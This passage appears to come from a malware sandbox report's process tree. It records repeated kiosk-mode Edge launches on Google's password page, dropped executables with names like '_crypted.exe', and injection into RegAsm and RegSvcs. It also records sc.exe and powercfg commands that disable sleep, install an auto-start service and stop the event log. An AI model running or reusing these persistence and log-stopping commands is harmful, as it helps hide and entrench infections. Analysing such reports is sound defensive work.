                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                              8⤵
                                                                                                PID:6300
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                              7⤵
                                                                                                PID:5524
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                  8⤵
                                                                                                    PID:5480
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                  7⤵
                                                                                                    PID:38244
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                      8⤵
                                                                                                        PID:38256
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                      7⤵
                                                                                                        PID:38464
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                          8⤵
                                                                                                            PID:38520
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                          7⤵
                                                                                                            PID:8500
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                              8⤵
                                                                                                                PID:6760
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                              7⤵
                                                                                                                PID:14992
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                  8⤵
                                                                                                                    PID:14964
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                  7⤵
                                                                                                                    PID:14228
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                      8⤵
                                                                                                                        PID:14208
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                      7⤵
                                                                                                                        PID:13516
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                          8⤵
                                                                                                                            PID:13444
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                          7⤵
                                                                                                                            PID:12724
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                              8⤵
                                                                                                                                PID:12508
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                              7⤵
                                                                                                                                PID:11788
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                                  8⤵
                                                                                                                                    PID:11704
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                                  7⤵
                                                                                                                                    PID:10216
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                                      8⤵
                                                                                                                                        PID:9820
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                                      7⤵
                                                                                                                                        PID:8740
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                                          8⤵
                                                                                                                                            PID:8480
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                                          7⤵
                                                                                                                                            PID:7140
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                                              8⤵
                                                                                                                                                PID:7172
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                                              7⤵
                                                                                                                                                PID:9924
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                                                  8⤵
                                                                                                                                                    PID:9872
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                                                  7⤵
                                                                                                                                                    PID:5948
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5896
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
                                                                                                                                                      7⤵
                                                                                                                                                        PID:5356
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5328
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\66dd9bfe41964_w9.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\66dd9bfe41964_w9.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:38448
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\66dcab0bcba58_crypted.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\66dcab0bcba58_crypted.exe"
                                                                                                                                                2⤵
                                                                                                                                                  PID:26108
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6844
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:6820
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\66dd2c2d3b88f_opera.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\66dd2c2d3b88f_opera.exe"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:23640
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                          3⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:17460
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                          3⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:17436
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                          3⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:17416
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                          3⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:17388
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe delete "RRTELIGS"
                                                                                                                                                          3⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:17368
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe create "RRTELIGS" binpath= "C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe" start= "auto"
                                                                                                                                                          3⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:16756
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                          3⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:16116
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe start "RRTELIGS"
                                                                                                                                                          3⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:16088
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\66dcad8f5f33a_crypted.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\66dcad8f5f33a_crypted.exe"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:23264
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:15928
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:20640
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9f612cc40,0x7ff9f612cc4c,0x7ff9f612cc58
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:20612
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\Installer.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\Installer.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:19532
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\66d9f685932be_uninstaller.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\66d9f685932be_uninstaller.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:16404
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:7976
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\66d9f6e9330e4_deep.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\66d9f6e9330e4_deep.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:15328
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\66d9ddcb9dbfe_Build.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\66d9ddcb9dbfe_Build.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:9692
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:9008
                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5292
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:8288
                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:38128
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\Accounts.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\Accounts.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:7144
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\Meeting.sfx.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\Meeting.sfx.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:6976
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Meeting.exe
